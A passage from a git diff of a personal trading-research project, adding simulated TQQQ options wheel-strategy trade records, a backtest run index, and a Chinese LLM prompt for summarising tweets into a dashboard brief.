26.218311309814453, + "premium": 0.33708771454217246, + "close_cost": 0.16558444312233567, + "pnl": 11.17032714198368, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2024-05-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 26.97, + "spot": 28.991544723510742, + "premium": 0.4305165718907613, + "close_cost": 0.13227884898719733, + "pnl": 23.843772290356398, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-05-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.94, + "spot": 31.098419189453125, + "premium": 0.31617291244159773, + "close_cost": 0.0820109649323677, + "pnl": 17.436194750923004, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-06-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.83, + "spot": 30.936729431152344, + "premium": 0.11801775394874969, + "close_cost": 0.002762488974923205, + "pnl": 5.545526497382648, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-06-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.11, + "spot": 36.394996643066406, + "premium": 0.1653596465226146, + "close_cost": 0.039127761115247184, + "pnl": 6.643188540736741, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-07-12 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.69, + "spot": 39.66231918334961, + "premium": 0.24589626579027524, + "close_cost": 0.10430722379838109, + "pnl": 8.178904199189414, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-07-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.77, + "spot": 36.47517013549805, + "premium": 0.3572453643803266, + "close_cost": 0.07405543276080628, + "pnl": 22.338993161952033, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-07-29 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 29.25, + "spot": 32.19612503051758, + "premium": 0.5102510793542496, + "close_cost": 0.074443578168927, + "pnl": 37.60075011853226, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-08-08 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 29.29, + "spot": 28.55647850036621, + "premium": 0.7010706116373804, + "close_cost": 0.7335214996337882, + "pnl": -6.235088799640783, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2024-08-15 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 29.13, + "spot": 33.671661376953125, + "premium": 1.3443929218833262, + "close_cost": 4.541661376953126, + "pnl": -322.71684550698, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2024-08-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.65, + "spot": 35.06849670410156, + "premium": 1.0726093467750317, + "close_cost": 0.2317729280427434, + "pnl": 78.10364187322882, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-08-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.61, + "spot": 33.671661376953125, + "premium": 0.9025333987399904, + "close_cost": 0.40030039966873776, + "pnl": 44.24329990712526, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-08-30 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 30.68, + "spot": 33.74543380737305, + "premium": 0.7006666469634997, + "close_cost": 0.30126643667670017, + "pnl": 33.96002102867995, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-09-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 28.67, + "spot": 29.85494613647461, + "premium": 0.5583216694304518, + "close_cost": 0.25136531531858264, + "pnl": 24.715635411186916, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2024-09-16 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 30.74, + "spot": 32.683048248291016, + "premium": 0.6174757469756766, + "close_cost": 0.20180647167188948, + "pnl": 35.586927530378716, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-09-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.63, + "spot": 34.74879837036133, + "premium": 0.6367595515683835, + "close_cost": 0.21373822998126624, + "pnl": 36.322132158711725, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-09-30 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.95, + "spot": 35.76860809326172, + "premium": 0.5650585144938596, + "close_cost": 0.2668854435764265, + "pnl": 23.837307091743305, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-10-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.24, + "spot": 35.51203155517578, + "premium": 0.3887764564468892, + "close_cost": 0.06320469614601976, + "pnl": 26.577176030086942, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-10-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 34.37, + "spot": 37.59922790527344, + "premium": 0.22206165347401274, + "close_cost": 0.011170874416824406, + "pnl": 15.109077905718834, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-10-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 33.3, + "spot": 36.26697540283203, + "premium": 0.19186371048025297, + "close_cost": 0.06901254031154913, + "pnl": 6.305117016870383, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-11-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.21, + "spot": 34.99885559082031, + "premium": 0.2972695736232076, + "close_cost": 0.12918871931240528, + "pnl": 10.828085431080233, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-11-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 37.13, + "spot": 38.092655181884766, + "premium": 0.43020968545040184, + "close_cost": 0.17248409741390525, + "pnl": 19.79255880364966, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2024-11-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.16, + "spot": 38.78839111328125, + "premium": 0.4931513518335091, + "close_cost": 0.12697060799143234, + "pnl": 30.638074384207673, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2024-12-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 37.05, + "spot": 40.697959899902344, + "premium": 0.3498505115059283, + "close_cost": 0.05440131131299397, + "pnl": 23.564920019293428, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2024-12-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.59, + "spot": 44.11248016357422, + "premium": 0.30722181455396935, + "close_cost": 0.1262852017138698, + "pnl": 12.113661284009954, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2024-12-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 37.54, + "spot": 40.969337463378906, + "premium": 0.47785603181040237, + "close_cost": 0.23465262136836618, + "pnl": 18.34034104420362, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2025-01-02 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 41.07, + "spot": 38.92718505859375, + "premium": 0.5758441629633673, + "close_cost": 2.1428149414062503, + "pnl": -159.6870778442883, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-01-10 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 39.71, + "spot": 38.03606414794922, + "premium": 1.1539370143830947, + "close_cost": 0.0, + "pnl": 109.41370143830947, + "hold_days": 8, + "result": "Win" + }, + { + "date": "2025-01-17 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 38.8, + "spot": 41.159942626953125, + "premium": 1.2706659413941264, + "close_cost": 2.359942626953128, + "pnl": -111.91766855590014, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-01-21 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.69, + "spot": 41.843135833740234, + "premium": 0.7541480199745383, + "close_cost": 0.09637341425902468, + "pnl": 59.797460571551355, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-01-31 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.37, + "spot": 40.95201110839844, + "premium": 0.5349361579062073, + "close_cost": 0.0, + "pnl": 47.51361579062073, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-02-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.49, + "spot": 41.41242599487305, + "premium": 0.6050736393249689, + "close_cost": 0.15354770602327594, + "pnl": 39.17259333016929, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-02-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.5, + "spot": 42.39760971069336, + "premium": 0.5489755728222274, + "close_cost": 0.09381663937623808, + "pnl": 39.53589334459893, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-02-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 41.8, + "spot": 44.749183654785156, + "premium": 0.4665354770431396, + "close_cost": 0.09728726355701411, + "pnl": 30.944821348612546, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-02-28 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 38.96, + "spot": 37.09048080444336, + "premium": 0.4533980900662211, + "close_cost": 1.8695191955566415, + "pnl": -144.60211054904204, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-03-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 37.83, + "spot": 34.694358825683594, + "premium": 0.9698374390220561, + "close_cost": 0.1365982318150123, + "pnl": 77.34392072070438, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-03-10 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 35.39, + "spot": 29.61001205444336, + "premium": 0.9927947712487981, + "close_cost": 0.0, + "pnl": 93.2994771248798, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-03-17 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 30.2, + "spot": 31.23383331298828, + "premium": 1.1216170740944023, + "close_cost": 1.033833312988282, + "pnl": 5.788376110612029, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-03-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 29.36, + "spot": 32.73883819580078, + "premium": 0.7427745803809369, + "close_cost": 0.0, + "pnl": 68.2974580380937, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2025-03-31 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 30.77, + "spot": 28.451080322265625, + "premium": 0.8759670482703168, + "close_cost": 2.3189196777343746, + "pnl": -147.2852629464058, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-04-03 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 29.02, + "spot": 24.97538185119629, + "premium": 1.1985382133782245, + "close_cost": 0.1267667761886413, + "pnl": 101.19714371895832, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-04-04 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 25.47, + "spot": 20.402353286743164, + "premium": 1.2617948816111983, + "close_cost": 0.14710830523223617, + "pnl": 105.48865763789621, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2025-04-11 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 20.81, + "spot": 24.12135124206543, + "premium": 1.2512472548902789, + "close_cost": 3.311351242065431, + "pnl": -209.00039871751522, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2025-04-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.67, + "spot": 24.722152709960938, + "premium": 1.8845621389953475, + "close_cost": 0.8536547202365341, + "pnl": 97.11074187588135, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-04-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 19.54, + "spot": 23.858192443847656, + "premium": 1.6562021427062854, + "close_cost": 0.5767803264061984, + "pnl": 101.9621816300087, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2025-05-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 25.12, + "spot": 28.18791961669922, + "premium": 2.178156040602474, + "close_cost": 1.0562061799709515, + "pnl": 106.21498606315224, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-05-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.26, + "spot": 29.34979820251465, + "premium": 1.9102957306270394, + "close_cost": 0.4027422953359183, + "pnl": 144.77534352911212, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2025-05-27 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.71, + "spot": 35.22372817993164, + "premium": 0.47503560969541603, + "close_cost": 0.0005443730963770946, + "pnl": 41.469123659903886, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2025-06-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.69, + "spot": 35.55640411376953, + "premium": 0.498169389331375, + "close_cost": 0.03134308638952921, + "pnl": 40.70263029418457, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2025-10-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 48.35, + "spot": 53.771759033203125, + "premium": 0.5454113698995897, + "close_cost": 0.007119091985766268, + "pnl": 47.84922779138235, + "hold_days": 5, + "result": "Win" + }, + { + "date": "2025-10-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 49.0, + "spot": 53.437835693359375, + "premium": 0.5796138664200132, + "close_cost": 0.27775405740060854, + "pnl": 24.205980901940467, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2025-11-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 53.92, + "spot": 58.97001266479492, + "premium": 0.8310872799165008, + "close_cost": 0.11816318541265058, + "pnl": 65.31240945038502, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-11-10 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 50.08, + "spot": 56.17401885986328, + "premium": 0.9419560347662923, + "close_cost": 0.02374044958327315, + "pnl": 85.84155851830191, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-11-19 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 49.03, + "spot": 49.864349365234375, + "premium": 0.7034800368865071, + "close_cost": 0.3489519252090876, + "pnl": 29.47281116774195, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2025-11-24 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 43.52, + "spot": 50.91596603393555, + "premium": 0.7094021584322991, + "close_cost": 0.010778629045536614, + "pnl": 63.88235293867625, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-12-02 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 51.1, + "spot": 55.12240982055664, + "premium": 0.8885543779888483, + "close_cost": 0.22771800847670587, + "pnl": 60.10363695121424, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-12-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 52.61, + "spot": 55.83012390136719, + "premium": 0.7019645425702343, + "close_cost": 0.1930723601146349, + "pnl": 44.90921824555994, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2025-12-18 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 46.29, + "spot": 51.34457778930664, + "premium": 0.5344252451993174, + "close_cost": 0.181495753739374, + "pnl": 29.31294914599434, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2026-02-09 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 47.48, + "spot": 51.654598236083984, + "premium": 0.5631882299256876, + "close_cost": 0.13619518544464349, + "pnl": 36.71930444810441, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-02-17 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 45.49, + "spot": 48.27019119262695, + "premium": 0.5999675089349932, + "close_cost": 0.22028255990625123, + "pnl": 31.988494902874198, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2026-02-25 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 46.72, + "spot": 51.78438186645508, + "premium": 0.5420435636602043, + "close_cost": 0.18373995818888744, + "pnl": 29.85036054713169, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2026-03-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 45.14, + "spot": 50.17703628540039, + "premium": 0.5493659811993616, + "close_cost": 0.16897163249998304, + "pnl": 32.05943486993786, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2026-03-23 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 40.43, + "spot": 44.496429443359375, + "premium": 0.4571711027535059, + "close_cost": 0.07888536647135913, + "pnl": 31.848573628214677, + "hold_days": 3, + "result": "Win" + }, + { + "date": "2026-03-31 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 36.45, + "spot": 41.68000030517578, + "premium": 0.4899103648679599, + "close_cost": 0.032759820956997254, + "pnl": 39.73505439109627, + "hold_days": 4, + "result": "Win" + }, + { + "date": "2026-04-08 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 41.45, + "spot": 48.0, + "premium": 0.7825883684419885, + "close_cost": 0.12738446714409735, + "pnl": 59.54039012978912, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2026-04-14 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 47.62, + "spot": 53.40999984741211, + "premium": 1.0000270235383635, + "close_cost": 0.3787688574986454, + "pnl": 56.14581660397181, + "hold_days": 1, + "result": "Win" + } +] \ No newline at end of file diff --git a/data/dashboard/wheel_history/index.json b/data/dashboard/wheel_history/index.json new file mode 100644 index 0000000..de3ad0e --- /dev/null +++ b/data/dashboard/wheel_history/index.json @@ -0,0 +1,132 @@ +[ + { + "report_id": "20260424T205423_326207", + "style": "aggressive", + "ticker": "TQQQ", + "run_at": "2026-04-24 20:54:23", + "start": "2021-04-01", + "end": "2026-04-24", + "engine_version": "wheel-v3-split", + "rule_version": "tqqq-wheel-manual-v1.1", + "path": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ", + "charts": { + "equity": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/charts/equity.png", + "drawdown": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/charts/drawdown.png", + "monthly": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/charts/monthly.png", + "indicators": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T205423_326207_aggressive_TQQQ/charts/indicators.png" + }, + "total_return": 22.376311911285395, + "sharpe": 0.18207740240393414, + "max_dd": -12.670101265549032 + }, + { + "report_id": "20260424T205311_5c7b8e", + "style": "aggressive", + "ticker": "TQQQ", + "run_at": "2026-04-24 20:53:11", + "start": "2025-04-24", + "end": "2026-04-24", + "engine_version": "wheel-v3-split", + "rule_version": "tqqq-wheel-manual-v1.1", + "path": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ", + "charts": { + "equity": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/charts/equity.png", + "drawdown": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/charts/drawdown.png", + "monthly": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/charts/monthly.png", + "indicators": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T205311_5c7b8e_aggressive_TQQQ/charts/indicators.png" + }, + "total_return": 13.682463255870015, + "sharpe": 2.857837373795672, + "max_dd": -2.073090936612936 + }, + { + "report_id": "20260424T185137_70fe1c", + "style": "aggressive", + "ticker": "TQQQ", + "run_at": "2026-04-24 18:51:37", + "start": "2021-04-24", + "end": "2026-04-24", + "path": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ", + "charts": { + "equity": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/charts/equity.png", + "drawdown": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/charts/drawdown.png", + "monthly": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/charts/monthly.png", + "indicators": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T185137_70fe1c_aggressive_TQQQ/charts/indicators.png" + }, + "total_return": 21.203246816790934, + "sharpe": 0.15407662226007332, + "max_dd": -12.80745424951754 + }, + { + "report_id": "20260424T185104_8b7c45", + "style": "aggressive", + "ticker": "TQQQ", + "run_at": "2026-04-24 18:51:04", + "start": "2021-04-24", + "end": "2026-04-24", + "path": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ", + "charts": { + "equity": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/charts/equity.png", + "drawdown": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/charts/drawdown.png", + "monthly": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/charts/monthly.png", + "indicators": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T185104_8b7c45_aggressive_TQQQ/charts/indicators.png" + }, + "total_return": 22.733742227955787, + "sharpe": 0.1856543053754313, + "max_dd": -12.24209072332098 + }, + { + "report_id": "20260424T185005_c7f829", + "style": "conservative", + "ticker": "TQQQ", + "run_at": "2026-04-24 18:50:05", + "start": "2025-04-24", + "end": "2026-04-24", + "path": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ", + "charts": { + "equity": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/charts/equity.png", + "drawdown": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/charts/drawdown.png", + "monthly": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/charts/monthly.png", + "indicators": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T185005_c7f829_conservative_TQQQ/charts/indicators.png" + }, + "total_return": 5.458408550097382, + "sharpe": 2.031983303515009, + "max_dd": -0.6003518878697439 + }, + { + "report_id": "20260424T184944_278d57", + "style": "neutral", + "ticker": "TQQQ", + "run_at": "2026-04-24 18:49:44", + "start": "2025-04-24", + "end": "2026-04-24", + "path": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ", + "charts": { + "equity": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/charts/equity.png", + "drawdown": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/charts/drawdown.png", + "monthly": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/charts/monthly.png", + "indicators": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T184944_278d57_neutral_TQQQ/charts/indicators.png" + }, + "total_return": 5.328146325585448, + "sharpe": 0.5849740422340445, + "max_dd": -2.5196350839124597 + }, + { + "report_id": "20260424T184855_48a5b2", + "style": "neutral", + "ticker": "TQQQ", + "run_at": "2026-04-24 18:48:55", + "start": "2025-04-24", + "end": "2026-04-24", + "path": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ", + "charts": { + "equity": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/charts/equity.png", + "drawdown": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/charts/drawdown.png", + "monthly": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/charts/monthly.png", + "indicators": "/Users/qiwei/Desktop/Desktop - Qiwei’s MacBook Pro M1/Final cut projects/fin_bilibili/TradingAgents/TradingAgents/data/dashboard/wheel_history/20260424T184855_48a5b2_neutral_TQQQ/charts/indicators.png" + }, + "total_return": 3.2482335125425754, + "sharpe": 0.09896699284613594, + "max_dd": -2.619957219409812 + } +] \ No newline at end of file diff --git a/data/x_brief/debug/20260428_010100_l1_input.txt b/data/x_brief/debug/20260428_010100_l1_input.txt new file mode 100644 index 0000000..70dd22f --- /dev/null +++ b/data/x_brief/debug/20260428_010100_l1_input.txt @@ -0,0 +1,413 @@ +[meta] + +tweets=120 + +tweet_summary_chars=61510 + + + +[prompt] + +你是“X资讯月报总编”。请将原始推文样本压缩为前端仪表盘可直接渲染的模块化 JSON。 + +你必须遵循“用户配置文档”的偏好: +- 优先覆盖“我现在最关心的事”; +- 按“账号权重与偏好”做信息优先级排序(高权重账号更容易进入 themes/p0); +- 按“内容类型偏好(✅/❌)”进行取舍; +- 尽量贴合“简报格式偏好”的表达风格(中文总结为主,保留关键英文原句); +- 页面是固定模块位,内容应服务于前端模块整合,不要输出散乱信息。 + +硬性要求: +1) 只输出 JSON 对象,不要 markdown。 +2) 使用如下字段: +{ + "themes":[{"id":"t1","title":"...","subtitle":"...","bullets":["..."],"samples":[{"text":"...","url":"...","handle":"...","date":"..."}]}], + "p0_events":[{"id":"p01","title":"...","meta":"...","summary":"...","url":"..."}], + "top_quotes":[{"id":"q1","quote":"...","speaker":"...","date":"...","note":"...","url":"..."}], + "category_updates":[{"id":"c1","title":"...","subtitle":"...","level":"P0|P1|P2|WARN","items":[{"text":"...","url":"..."}]}], + "risk_signals":[{"id":"r1","level":"HIGH|MID|OPP","title":"...","detail":"..."}] +} +3) 数量限制:themes=3, p0_events<=6, top_quotes<=3, category_updates<=6, risk_signals<=6。 +4) 优先引用有明确链接的证据;无法确定时宁缺毋滥。 +5) 内容必须中文,简洁可执行。 + +用户配置文档(用于本次简报编排): +# 我的 X 资讯简报配置 +> 这是一份活的文档。你可以随时手动编辑,Claude 也会根据你的阅读行为自动更新行为日志和权重建议。 +> 设计参考:Karpathy 的 LLM Wiki 模式——知识预编译,随时间积累。 + +**创建日期**:2026-04-26 +**最后更新**:2026-04-28(账号列表经核查优化:修正7处、新增5个、删除7个) + +--- + +## 一、我现在最关心的事 +> 这是简报的核心过滤器。Claude 在筛选和总结推文时,会优先选出和这里相关的内容放进主题卡片。 + +- 探索 AI 工具在投资研究和期权分析中的实际应用 +- 寻找值得在 B站分享的开源项目和 